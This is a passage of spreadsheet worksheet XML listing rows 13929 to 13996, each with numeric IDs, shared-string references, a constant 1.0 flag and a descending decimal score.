      <c r="F13929" s="2">
        <v>0.2936507936507937</v>
      </c>
    </row>
    <row r="13930" ht="15.75" customHeight="1">
      <c r="A13930" s="1">
        <v>6362.0</v>
      </c>
      <c r="B13930" s="2">
        <v>4.8350066E7</v>
      </c>
      <c r="C13930" s="2" t="s">
        <v>13409</v>
      </c>
      <c r="D13930" s="2">
        <v>1.0</v>
      </c>
      <c r="E13930" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13930" s="2">
        <v>0.2849563046192259</v>
      </c>
    </row>
    <row r="13931" ht="15.75" customHeight="1">
      <c r="A13931" s="1">
        <v>813.0</v>
      </c>
      <c r="B13931" s="2">
        <v>2.1390637E7</v>
      </c>
      <c r="C13931" s="2" t="s">
        <v>13410</v>
      </c>
      <c r="D13931" s="2">
        <v>1.0</v>
      </c>
      <c r="E13931" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13931" s="2">
        <v>0.2847847847847848</v>
      </c>
    </row>
    <row r="13932" ht="15.75" customHeight="1">
      <c r="A13932" s="1">
        <v>3929.0</v>
      </c>
      <c r="B13932" s="2">
        <v>4.0567345E7</v>
      </c>
      <c r="C13932" s="2" t="s">
        <v>13411</v>
      </c>
      <c r="D13932" s="2">
        <v>1.0</v>
      </c>
      <c r="E13932" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13932" s="2">
        <v>0.2835917312661498</v>
      </c>
    </row>
    <row r="13933" ht="15.75" customHeight="1">
      <c r="A13933" s="1">
        <v>8616.0</v>
      </c>
      <c r="B13933" s="2">
        <v>5.4267144E7</v>
      </c>
      <c r="C13933" s="2" t="s">
        <v>13412</v>
      </c>
      <c r="D13933" s="2">
        <v>1.0</v>
      </c>
      <c r="E13933" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13933" s="2">
        <v>0.2684210526315789</v>
      </c>
    </row>
    <row r="13934" ht="15.75" customHeight="1">
      <c r="A13934" s="1">
        <v>9673.0</v>
      </c>
      <c r="B13934" s="2">
        <v>5.632529E7</v>
      </c>
      <c r="C13934" s="2" t="s">
        <v>13413</v>
      </c>
      <c r="D13934" s="2">
        <v>1.0</v>
      </c>
      <c r="E13934" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13934" s="2">
        <v>0.2665165165165166</v>
      </c>
    </row>
    <row r="13935" ht="15.75" customHeight="1">
      <c r="A13935" s="1">
        <v>867.0</v>
      </c>
      <c r="B13935" s="2">
        <v>2.1831955E7</v>
      </c>
      <c r="C13935" s="2" t="s">
        <v>13414</v>
      </c>
      <c r="D13935" s="2">
        <v>1.0</v>
      </c>
      <c r="E13935" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13935" s="2">
        <v>0.2560137457044674</v>
      </c>
    </row>
    <row r="13936" ht="15.75" customHeight="1">
      <c r="A13936" s="1">
        <v>4657.0</v>
      </c>
      <c r="B13936" s="2">
        <v>4.3117754E7</v>
      </c>
      <c r="C13936" s="2" t="s">
        <v>13415</v>
      </c>
      <c r="D13936" s="2">
        <v>1.0</v>
      </c>
      <c r="E13936" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13936" s="2">
        <v>0.2554466230936819</v>
      </c>
    </row>
    <row r="13937" ht="15.75" customHeight="1">
      <c r="A13937" s="1">
        <v>6617.0</v>
      </c>
      <c r="B13937" s="2">
        <v>4.9030056E7</v>
      </c>
      <c r="C13937" s="2" t="s">
        <v>13416</v>
      </c>
      <c r="D13937" s="2">
        <v>1.0</v>
      </c>
      <c r="E13937" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13937" s="2">
        <v>0.2547892720306513</v>
      </c>
    </row>
    <row r="13938" ht="15.75" customHeight="1">
      <c r="A13938" s="1">
        <v>9976.0</v>
      </c>
      <c r="B13938" s="2">
        <v>5.6943467E7</v>
      </c>
      <c r="C13938" s="2" t="s">
        <v>13417</v>
      </c>
      <c r="D13938" s="2">
        <v>1.0</v>
      </c>
      <c r="E13938" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13938" s="2">
        <v>0.2523809523809523</v>
      </c>
    </row>
    <row r="13939" ht="15.75" customHeight="1">
      <c r="A13939" s="1">
        <v>6346.0</v>
      </c>
      <c r="B13939" s="2">
        <v>4.8313388E7</v>
      </c>
      <c r="C13939" s="2" t="s">
        <v>13418</v>
      </c>
      <c r="D13939" s="2">
        <v>1.0</v>
      </c>
      <c r="E13939" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13939" s="2">
        <v>0.2517094017094017</v>
      </c>
    </row>
    <row r="13940" ht="15.75" customHeight="1">
      <c r="A13940" s="1">
        <v>4771.0</v>
      </c>
      <c r="B13940" s="2">
        <v>4.3436474E7</v>
      </c>
      <c r="C13940" s="2" t="s">
        <v>13419</v>
      </c>
      <c r="D13940" s="2">
        <v>1.0</v>
      </c>
      <c r="E13940" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13940" s="2">
        <v>0.2514245014245014</v>
      </c>
    </row>
    <row r="13941" ht="15.75" customHeight="1">
      <c r="A13941" s="1">
        <v>28392.0</v>
      </c>
      <c r="B13941" s="2">
        <v>2.6175772E7</v>
      </c>
      <c r="C13941" s="5" t="s">
        <v>13420</v>
      </c>
      <c r="D13941" s="2">
        <v>1.0</v>
      </c>
      <c r="E13941" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13941" s="2">
        <v>0.2449494949494949</v>
      </c>
    </row>
    <row r="13942" ht="15.75" customHeight="1">
      <c r="A13942" s="1">
        <v>7039.0</v>
      </c>
      <c r="B13942" s="2">
        <v>5.0142387E7</v>
      </c>
      <c r="C13942" s="2" t="s">
        <v>13421</v>
      </c>
      <c r="D13942" s="2">
        <v>1.0</v>
      </c>
      <c r="E13942" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13942" s="2">
        <v>0.2439613526570048</v>
      </c>
    </row>
    <row r="13943" ht="15.75" customHeight="1">
      <c r="A13943" s="1">
        <v>7000.0</v>
      </c>
      <c r="B13943" s="2">
        <v>5.0077526E7</v>
      </c>
      <c r="C13943" s="2" t="s">
        <v>13421</v>
      </c>
      <c r="D13943" s="2">
        <v>1.0</v>
      </c>
      <c r="E13943" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13943" s="2">
        <v>0.2423510466988727</v>
      </c>
    </row>
    <row r="13944" ht="15.75" customHeight="1">
      <c r="A13944" s="1">
        <v>8485.0</v>
      </c>
      <c r="B13944" s="2">
        <v>5.4040135E7</v>
      </c>
      <c r="C13944" s="2" t="s">
        <v>13422</v>
      </c>
      <c r="D13944" s="2">
        <v>1.0</v>
      </c>
      <c r="E13944" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13944" s="2">
        <v>0.2410130718954248</v>
      </c>
    </row>
    <row r="13945" ht="15.75" customHeight="1">
      <c r="A13945" s="1">
        <v>9954.0</v>
      </c>
      <c r="B13945" s="2">
        <v>5.6907812E7</v>
      </c>
      <c r="C13945" s="2" t="s">
        <v>13423</v>
      </c>
      <c r="D13945" s="2">
        <v>1.0</v>
      </c>
      <c r="E13945" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13945" s="2">
        <v>0.2402190923317684</v>
      </c>
    </row>
    <row r="13946" ht="15.75" customHeight="1">
      <c r="A13946" s="1">
        <v>8828.0</v>
      </c>
      <c r="B13946" s="2">
        <v>5.4651189E7</v>
      </c>
      <c r="C13946" s="2" t="s">
        <v>13424</v>
      </c>
      <c r="D13946" s="2">
        <v>1.0</v>
      </c>
      <c r="E13946" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13946" s="2">
        <v>0.2373366013071895</v>
      </c>
    </row>
    <row r="13947" ht="15.75" customHeight="1">
      <c r="A13947" s="1">
        <v>794.0</v>
      </c>
      <c r="B13947" s="2">
        <v>2.1224629E7</v>
      </c>
      <c r="C13947" s="2" t="s">
        <v>13425</v>
      </c>
      <c r="D13947" s="2">
        <v>1.0</v>
      </c>
      <c r="E13947" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13947" s="2">
        <v>0.2353801169590643</v>
      </c>
    </row>
    <row r="13948" ht="15.75" customHeight="1">
      <c r="A13948" s="1">
        <v>8390.0</v>
      </c>
      <c r="B13948" s="2">
        <v>5.3845717E7</v>
      </c>
      <c r="C13948" s="2" t="s">
        <v>13426</v>
      </c>
      <c r="D13948" s="2">
        <v>1.0</v>
      </c>
      <c r="E13948" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13948" s="2">
        <v>0.2351598173515982</v>
      </c>
    </row>
    <row r="13949" ht="15.75" customHeight="1">
      <c r="A13949" s="1">
        <v>29882.0</v>
      </c>
      <c r="B13949" s="2">
        <v>3607000.0</v>
      </c>
      <c r="C13949" s="2" t="s">
        <v>13427</v>
      </c>
      <c r="D13949" s="2">
        <v>1.0</v>
      </c>
      <c r="E13949" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13949" s="2">
        <v>0.2318518518518519</v>
      </c>
    </row>
    <row r="13950" ht="15.75" customHeight="1">
      <c r="A13950" s="1">
        <v>2372.0</v>
      </c>
      <c r="B13950" s="2">
        <v>3.3243756E7</v>
      </c>
      <c r="C13950" s="2" t="s">
        <v>13428</v>
      </c>
      <c r="D13950" s="2">
        <v>1.0</v>
      </c>
      <c r="E13950" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13950" s="2">
        <v>0.2302631578947368</v>
      </c>
    </row>
    <row r="13951" ht="15.75" customHeight="1">
      <c r="A13951" s="1">
        <v>9434.0</v>
      </c>
      <c r="B13951" s="2">
        <v>5.5801594E7</v>
      </c>
      <c r="C13951" s="2" t="s">
        <v>13429</v>
      </c>
      <c r="D13951" s="2">
        <v>1.0</v>
      </c>
      <c r="E13951" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13951" s="2">
        <v>0.2302469135802469</v>
      </c>
    </row>
    <row r="13952" ht="15.75" customHeight="1">
      <c r="A13952" s="1">
        <v>13461.0</v>
      </c>
      <c r="B13952" s="2">
        <v>3.5201126E7</v>
      </c>
      <c r="C13952" s="2" t="s">
        <v>13430</v>
      </c>
      <c r="D13952" s="2">
        <v>1.0</v>
      </c>
      <c r="E13952" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13952" s="2">
        <v>0.2277167277167277</v>
      </c>
    </row>
    <row r="13953" ht="15.75" customHeight="1">
      <c r="A13953" s="1">
        <v>16409.0</v>
      </c>
      <c r="B13953" s="2">
        <v>4.6297163E7</v>
      </c>
      <c r="C13953" s="2" t="s">
        <v>13431</v>
      </c>
      <c r="D13953" s="2">
        <v>1.0</v>
      </c>
      <c r="E13953" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13953" s="2">
        <v>0.2255291005291005</v>
      </c>
    </row>
    <row r="13954" ht="15.75" customHeight="1">
      <c r="A13954" s="1">
        <v>8257.0</v>
      </c>
      <c r="B13954" s="2">
        <v>5.3384847E7</v>
      </c>
      <c r="C13954" s="2" t="s">
        <v>13432</v>
      </c>
      <c r="D13954" s="2">
        <v>1.0</v>
      </c>
      <c r="E13954" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13954" s="2">
        <v>0.2254150702426564</v>
      </c>
    </row>
    <row r="13955" ht="15.75" customHeight="1">
      <c r="A13955" s="1">
        <v>26883.0</v>
      </c>
      <c r="B13955" s="2">
        <v>1.920039E7</v>
      </c>
      <c r="C13955" s="2" t="s">
        <v>13433</v>
      </c>
      <c r="D13955" s="2">
        <v>1.0</v>
      </c>
      <c r="E13955" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13955" s="2">
        <v>0.2253086419753086</v>
      </c>
    </row>
    <row r="13956" ht="15.75" customHeight="1">
      <c r="A13956" s="1">
        <v>6997.0</v>
      </c>
      <c r="B13956" s="2">
        <v>5.0077526E7</v>
      </c>
      <c r="C13956" s="2" t="s">
        <v>13434</v>
      </c>
      <c r="D13956" s="2">
        <v>1.0</v>
      </c>
      <c r="E13956" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13956" s="2">
        <v>0.2229166666666666</v>
      </c>
    </row>
    <row r="13957" ht="15.75" customHeight="1">
      <c r="A13957" s="1">
        <v>24120.0</v>
      </c>
      <c r="B13957" s="2">
        <v>1.0004351E7</v>
      </c>
      <c r="C13957" s="2" t="s">
        <v>13435</v>
      </c>
      <c r="D13957" s="2">
        <v>1.0</v>
      </c>
      <c r="E13957" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13957" s="2">
        <v>0.2214611872146119</v>
      </c>
    </row>
    <row r="13958" ht="15.75" customHeight="1">
      <c r="A13958" s="1">
        <v>433.0</v>
      </c>
      <c r="B13958" s="2">
        <v>1.7000459E7</v>
      </c>
      <c r="C13958" s="2" t="s">
        <v>13436</v>
      </c>
      <c r="D13958" s="2">
        <v>1.0</v>
      </c>
      <c r="E13958" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13958" s="2">
        <v>0.2195340501792115</v>
      </c>
    </row>
    <row r="13959" ht="15.75" customHeight="1">
      <c r="A13959" s="1">
        <v>8620.0</v>
      </c>
      <c r="B13959" s="2">
        <v>5.4267144E7</v>
      </c>
      <c r="C13959" s="2" t="s">
        <v>13437</v>
      </c>
      <c r="D13959" s="2">
        <v>1.0</v>
      </c>
      <c r="E13959" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13959" s="2">
        <v>0.2187807276302851</v>
      </c>
    </row>
    <row r="13960" ht="15.75" customHeight="1">
      <c r="A13960" s="1">
        <v>4696.0</v>
      </c>
      <c r="B13960" s="2">
        <v>4.3236906E7</v>
      </c>
      <c r="C13960" s="2" t="s">
        <v>13438</v>
      </c>
      <c r="D13960" s="2">
        <v>1.0</v>
      </c>
      <c r="E13960" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13960" s="2">
        <v>0.2174211248285322</v>
      </c>
    </row>
    <row r="13961" ht="15.75" customHeight="1">
      <c r="A13961" s="1">
        <v>10927.0</v>
      </c>
      <c r="B13961" s="2">
        <v>1.6865338E7</v>
      </c>
      <c r="C13961" s="2" t="s">
        <v>13439</v>
      </c>
      <c r="D13961" s="2">
        <v>1.0</v>
      </c>
      <c r="E13961" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13961" s="2">
        <v>0.2150793650793651</v>
      </c>
    </row>
    <row r="13962" ht="15.75" customHeight="1">
      <c r="A13962" s="1">
        <v>5657.0</v>
      </c>
      <c r="B13962" s="2">
        <v>4.6287888E7</v>
      </c>
      <c r="C13962" s="2" t="s">
        <v>13440</v>
      </c>
      <c r="D13962" s="2">
        <v>1.0</v>
      </c>
      <c r="E13962" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13962" s="2">
        <v>0.2140255009107468</v>
      </c>
    </row>
    <row r="13963" ht="15.75" customHeight="1">
      <c r="A13963" s="1">
        <v>5233.0</v>
      </c>
      <c r="B13963" s="2">
        <v>4.5014962E7</v>
      </c>
      <c r="C13963" s="2" t="s">
        <v>13441</v>
      </c>
      <c r="D13963" s="2">
        <v>1.0</v>
      </c>
      <c r="E13963" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13963" s="2">
        <v>0.2129629629629629</v>
      </c>
    </row>
    <row r="13964" ht="15.75" customHeight="1">
      <c r="A13964" s="1">
        <v>10274.0</v>
      </c>
      <c r="B13964" s="2">
        <v>5.7623868E7</v>
      </c>
      <c r="C13964" s="2" t="s">
        <v>13442</v>
      </c>
      <c r="D13964" s="2">
        <v>1.0</v>
      </c>
      <c r="E13964" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13964" s="2">
        <v>0.2123287671232877</v>
      </c>
    </row>
    <row r="13965" ht="15.75" customHeight="1">
      <c r="A13965" s="1">
        <v>5151.0</v>
      </c>
      <c r="B13965" s="2">
        <v>4.4687903E7</v>
      </c>
      <c r="C13965" s="2" t="s">
        <v>13443</v>
      </c>
      <c r="D13965" s="2">
        <v>1.0</v>
      </c>
      <c r="E13965" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13965" s="2">
        <v>0.2113665389527458</v>
      </c>
    </row>
    <row r="13966" ht="15.75" customHeight="1">
      <c r="A13966" s="1">
        <v>2559.0</v>
      </c>
      <c r="B13966" s="2">
        <v>3.422742E7</v>
      </c>
      <c r="C13966" s="2" t="s">
        <v>13444</v>
      </c>
      <c r="D13966" s="2">
        <v>1.0</v>
      </c>
      <c r="E13966" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13966" s="2">
        <v>0.2111111111111111</v>
      </c>
    </row>
    <row r="13967" ht="15.75" customHeight="1">
      <c r="A13967" s="1">
        <v>5713.0</v>
      </c>
      <c r="B13967" s="2">
        <v>4.6574177E7</v>
      </c>
      <c r="C13967" s="2" t="s">
        <v>13445</v>
      </c>
      <c r="D13967" s="2">
        <v>1.0</v>
      </c>
      <c r="E13967" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13967" s="2">
        <v>0.2097701149425287</v>
      </c>
    </row>
    <row r="13968" ht="15.75" customHeight="1">
      <c r="A13968" s="1">
        <v>9672.0</v>
      </c>
      <c r="B13968" s="2">
        <v>5.632529E7</v>
      </c>
      <c r="C13968" s="2" t="s">
        <v>13446</v>
      </c>
      <c r="D13968" s="2">
        <v>1.0</v>
      </c>
      <c r="E13968" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13968" s="2">
        <v>0.2085610200364299</v>
      </c>
    </row>
    <row r="13969" ht="15.75" customHeight="1">
      <c r="A13969" s="1">
        <v>11020.0</v>
      </c>
      <c r="B13969" s="2">
        <v>1.7830633E7</v>
      </c>
      <c r="C13969" s="2" t="s">
        <v>13447</v>
      </c>
      <c r="D13969" s="2">
        <v>1.0</v>
      </c>
      <c r="E13969" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13969" s="2">
        <v>0.2076923076923077</v>
      </c>
    </row>
    <row r="13970" ht="15.75" customHeight="1">
      <c r="A13970" s="1">
        <v>7036.0</v>
      </c>
      <c r="B13970" s="2">
        <v>5.0142387E7</v>
      </c>
      <c r="C13970" s="2" t="s">
        <v>13448</v>
      </c>
      <c r="D13970" s="2">
        <v>1.0</v>
      </c>
      <c r="E13970" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13970" s="2">
        <v>0.2048611111111111</v>
      </c>
    </row>
    <row r="13971" ht="15.75" customHeight="1">
      <c r="A13971" s="1">
        <v>9089.0</v>
      </c>
      <c r="B13971" s="2">
        <v>5.5139767E7</v>
      </c>
      <c r="C13971" s="2" t="s">
        <v>13449</v>
      </c>
      <c r="D13971" s="2">
        <v>1.0</v>
      </c>
      <c r="E13971" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13971" s="2">
        <v>0.2047184170471842</v>
      </c>
    </row>
    <row r="13972" ht="15.75" customHeight="1">
      <c r="A13972" s="1">
        <v>7576.0</v>
      </c>
      <c r="B13972" s="2">
        <v>5.1575645E7</v>
      </c>
      <c r="C13972" s="2" t="s">
        <v>13450</v>
      </c>
      <c r="D13972" s="2">
        <v>1.0</v>
      </c>
      <c r="E13972" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13972" s="2">
        <v>0.2042253521126761</v>
      </c>
    </row>
    <row r="13973" ht="15.75" customHeight="1">
      <c r="A13973" s="1">
        <v>15326.0</v>
      </c>
      <c r="B13973" s="2">
        <v>4.2527151E7</v>
      </c>
      <c r="C13973" s="2" t="s">
        <v>13451</v>
      </c>
      <c r="D13973" s="2">
        <v>1.0</v>
      </c>
      <c r="E13973" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13973" s="2">
        <v>0.2042253521126761</v>
      </c>
    </row>
    <row r="13974" ht="15.75" customHeight="1">
      <c r="A13974" s="1">
        <v>17427.0</v>
      </c>
      <c r="B13974" s="2">
        <v>4.9724782E7</v>
      </c>
      <c r="C13974" s="2" t="s">
        <v>13452</v>
      </c>
      <c r="D13974" s="2">
        <v>1.0</v>
      </c>
      <c r="E13974" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13974" s="2">
        <v>0.2028619528619529</v>
      </c>
    </row>
    <row r="13975" ht="15.75" customHeight="1">
      <c r="A13975" s="1">
        <v>31319.0</v>
      </c>
      <c r="B13975" s="2">
        <v>4973474.0</v>
      </c>
      <c r="C13975" s="2" t="s">
        <v>13453</v>
      </c>
      <c r="D13975" s="2">
        <v>1.0</v>
      </c>
      <c r="E13975" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13975" s="2">
        <v>0.2023809523809524</v>
      </c>
    </row>
    <row r="13976" ht="15.75" customHeight="1">
      <c r="A13976" s="1">
        <v>17042.0</v>
      </c>
      <c r="B13976" s="2">
        <v>4.8512467E7</v>
      </c>
      <c r="C13976" s="2" t="s">
        <v>13454</v>
      </c>
      <c r="D13976" s="2">
        <v>1.0</v>
      </c>
      <c r="E13976" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13976" s="2">
        <v>0.2023319615912208</v>
      </c>
    </row>
    <row r="13977" ht="15.75" customHeight="1">
      <c r="A13977" s="1">
        <v>12958.0</v>
      </c>
      <c r="B13977" s="2">
        <v>3.2465596E7</v>
      </c>
      <c r="C13977" s="2" t="s">
        <v>13455</v>
      </c>
      <c r="D13977" s="2">
        <v>1.0</v>
      </c>
      <c r="E13977" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13977" s="2">
        <v>0.2015669515669516</v>
      </c>
    </row>
    <row r="13978" ht="15.75" customHeight="1">
      <c r="A13978" s="1">
        <v>982.0</v>
      </c>
      <c r="B13978" s="2">
        <v>2.2825781E7</v>
      </c>
      <c r="C13978" s="2" t="s">
        <v>13456</v>
      </c>
      <c r="D13978" s="2">
        <v>1.0</v>
      </c>
      <c r="E13978" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13978" s="2">
        <v>0.2006944444444444</v>
      </c>
    </row>
    <row r="13979" ht="15.75" customHeight="1">
      <c r="A13979" s="1">
        <v>9579.0</v>
      </c>
      <c r="B13979" s="2">
        <v>5.6089238E7</v>
      </c>
      <c r="C13979" s="2" t="s">
        <v>13457</v>
      </c>
      <c r="D13979" s="2">
        <v>1.0</v>
      </c>
      <c r="E13979" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13979" s="2">
        <v>0.2006704980842911</v>
      </c>
    </row>
    <row r="13980" ht="15.75" customHeight="1">
      <c r="A13980" s="1">
        <v>793.0</v>
      </c>
      <c r="B13980" s="2">
        <v>2.1219791E7</v>
      </c>
      <c r="C13980" s="2" t="s">
        <v>13458</v>
      </c>
      <c r="D13980" s="2">
        <v>1.0</v>
      </c>
      <c r="E13980" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13980" s="2">
        <v>0.2005208333333334</v>
      </c>
    </row>
    <row r="13981" ht="15.75" customHeight="1">
      <c r="A13981" s="1">
        <v>6812.0</v>
      </c>
      <c r="B13981" s="2">
        <v>4.952962E7</v>
      </c>
      <c r="C13981" s="2" t="s">
        <v>13459</v>
      </c>
      <c r="D13981" s="2">
        <v>1.0</v>
      </c>
      <c r="E13981" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13981" s="2">
        <v>0.2005208333333334</v>
      </c>
    </row>
    <row r="13982" ht="15.75" customHeight="1">
      <c r="A13982" s="1">
        <v>18611.0</v>
      </c>
      <c r="B13982" s="2">
        <v>5.3335337E7</v>
      </c>
      <c r="C13982" s="2" t="s">
        <v>13460</v>
      </c>
      <c r="D13982" s="2">
        <v>1.0</v>
      </c>
      <c r="E13982" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13982" s="2">
        <v>0.1998456790123457</v>
      </c>
    </row>
    <row r="13983" ht="15.75" customHeight="1">
      <c r="A13983" s="1">
        <v>30251.0</v>
      </c>
      <c r="B13983" s="2">
        <v>3.7564385E7</v>
      </c>
      <c r="C13983" s="2" t="s">
        <v>13461</v>
      </c>
      <c r="D13983" s="2">
        <v>1.0</v>
      </c>
      <c r="E13983" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13983" s="2">
        <v>0.199820788530466</v>
      </c>
    </row>
    <row r="13984" ht="15.75" customHeight="1">
      <c r="A13984" s="1">
        <v>11550.0</v>
      </c>
      <c r="B13984" s="2">
        <v>2.2687228E7</v>
      </c>
      <c r="C13984" s="2" t="s">
        <v>13462</v>
      </c>
      <c r="D13984" s="2">
        <v>1.0</v>
      </c>
      <c r="E13984" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13984" s="2">
        <v>0.1987951807228915</v>
      </c>
    </row>
    <row r="13985" ht="15.75" customHeight="1">
      <c r="A13985" s="1">
        <v>8648.0</v>
      </c>
      <c r="B13985" s="2">
        <v>5.434896E7</v>
      </c>
      <c r="C13985" s="2" t="s">
        <v>13463</v>
      </c>
      <c r="D13985" s="2">
        <v>1.0</v>
      </c>
      <c r="E13985" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13985" s="2">
        <v>0.1984126984126985</v>
      </c>
    </row>
    <row r="13986" ht="15.75" customHeight="1">
      <c r="A13986" s="1">
        <v>14687.0</v>
      </c>
      <c r="B13986" s="2">
        <v>4.052339E7</v>
      </c>
      <c r="C13986" s="2" t="s">
        <v>13464</v>
      </c>
      <c r="D13986" s="2">
        <v>1.0</v>
      </c>
      <c r="E13986" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13986" s="2">
        <v>0.1984126984126985</v>
      </c>
    </row>
    <row r="13987" ht="15.75" customHeight="1">
      <c r="A13987" s="1">
        <v>19628.0</v>
      </c>
      <c r="B13987" s="2">
        <v>5.6273152E7</v>
      </c>
      <c r="C13987" s="2" t="s">
        <v>13465</v>
      </c>
      <c r="D13987" s="2">
        <v>1.0</v>
      </c>
      <c r="E13987" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13987" s="2">
        <v>0.1980994152046784</v>
      </c>
    </row>
    <row r="13988" ht="15.75" customHeight="1">
      <c r="A13988" s="1">
        <v>1199.0</v>
      </c>
      <c r="B13988" s="2">
        <v>2.474958E7</v>
      </c>
      <c r="C13988" s="2" t="s">
        <v>13466</v>
      </c>
      <c r="D13988" s="2">
        <v>1.0</v>
      </c>
      <c r="E13988" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13988" s="2">
        <v>0.197463768115942</v>
      </c>
    </row>
    <row r="13989" ht="15.75" customHeight="1">
      <c r="A13989" s="1">
        <v>27253.0</v>
      </c>
      <c r="B13989" s="2">
        <v>2.1085701E7</v>
      </c>
      <c r="C13989" s="2" t="s">
        <v>13467</v>
      </c>
      <c r="D13989" s="2">
        <v>1.0</v>
      </c>
      <c r="E13989" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13989" s="2">
        <v>0.1967320261437908</v>
      </c>
    </row>
    <row r="13990" ht="15.75" customHeight="1">
      <c r="A13990" s="1">
        <v>18609.0</v>
      </c>
      <c r="B13990" s="2">
        <v>5.3320582E7</v>
      </c>
      <c r="C13990" s="2" t="s">
        <v>13468</v>
      </c>
      <c r="D13990" s="2">
        <v>1.0</v>
      </c>
      <c r="E13990" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13990" s="2">
        <v>0.196256038647343</v>
      </c>
    </row>
    <row r="13991" ht="15.75" customHeight="1">
      <c r="A13991" s="1">
        <v>10695.0</v>
      </c>
      <c r="B13991" s="2">
        <v>1.4784846E7</v>
      </c>
      <c r="C13991" s="2" t="s">
        <v>13469</v>
      </c>
      <c r="D13991" s="2">
        <v>1.0</v>
      </c>
      <c r="E13991" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13991" s="2">
        <v>0.1958105646630237</v>
      </c>
    </row>
    <row r="13992" ht="15.75" customHeight="1">
      <c r="A13992" s="1">
        <v>5498.0</v>
      </c>
      <c r="B13992" s="2">
        <v>4.5807972E7</v>
      </c>
      <c r="C13992" s="2" t="s">
        <v>13470</v>
      </c>
      <c r="D13992" s="2">
        <v>1.0</v>
      </c>
      <c r="E13992" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13992" s="2">
        <v>0.1927297668038409</v>
      </c>
    </row>
    <row r="13993" ht="15.75" customHeight="1">
      <c r="A13993" s="1">
        <v>17503.0</v>
      </c>
      <c r="B13993" s="2">
        <v>5.0005842E7</v>
      </c>
      <c r="C13993" s="2" t="s">
        <v>13471</v>
      </c>
      <c r="D13993" s="2">
        <v>1.0</v>
      </c>
      <c r="E13993" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13993" s="2">
        <v>0.1919934640522876</v>
      </c>
    </row>
    <row r="13994" ht="15.75" customHeight="1">
      <c r="A13994" s="1">
        <v>1274.0</v>
      </c>
      <c r="B13994" s="2">
        <v>2.5424507E7</v>
      </c>
      <c r="C13994" s="2" t="s">
        <v>13472</v>
      </c>
      <c r="D13994" s="2">
        <v>1.0</v>
      </c>
      <c r="E13994" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13994" s="2">
        <v>0.1918402777777778</v>
      </c>
    </row>
    <row r="13995" ht="15.75" customHeight="1">
      <c r="A13995" s="1">
        <v>28126.0</v>
      </c>
      <c r="B13995" s="2">
        <v>2.472398E7</v>
      </c>
      <c r="C13995" s="2" t="s">
        <v>13473</v>
      </c>
      <c r="D13995" s="2">
        <v>1.0</v>
      </c>
      <c r="E13995" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13995" s="2">
        <v>0.1913580246913581</v>
      </c>
    </row>
    <row r="13996" ht="15.75" customHeight="1">
      <c r="A13996" s="1">
        <v>6478.0</v>
      </c>
      <c r="B13996" s="2">
        <v>4.8666003E7</v>
      </c>
      <c r="C13996" s="2" t="s">
        <v>13474</v>
      </c>
      <c r="D13996" s="2">
        <v>1.0</v>
      </c>
      <c r="E13996" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13996" s="2">
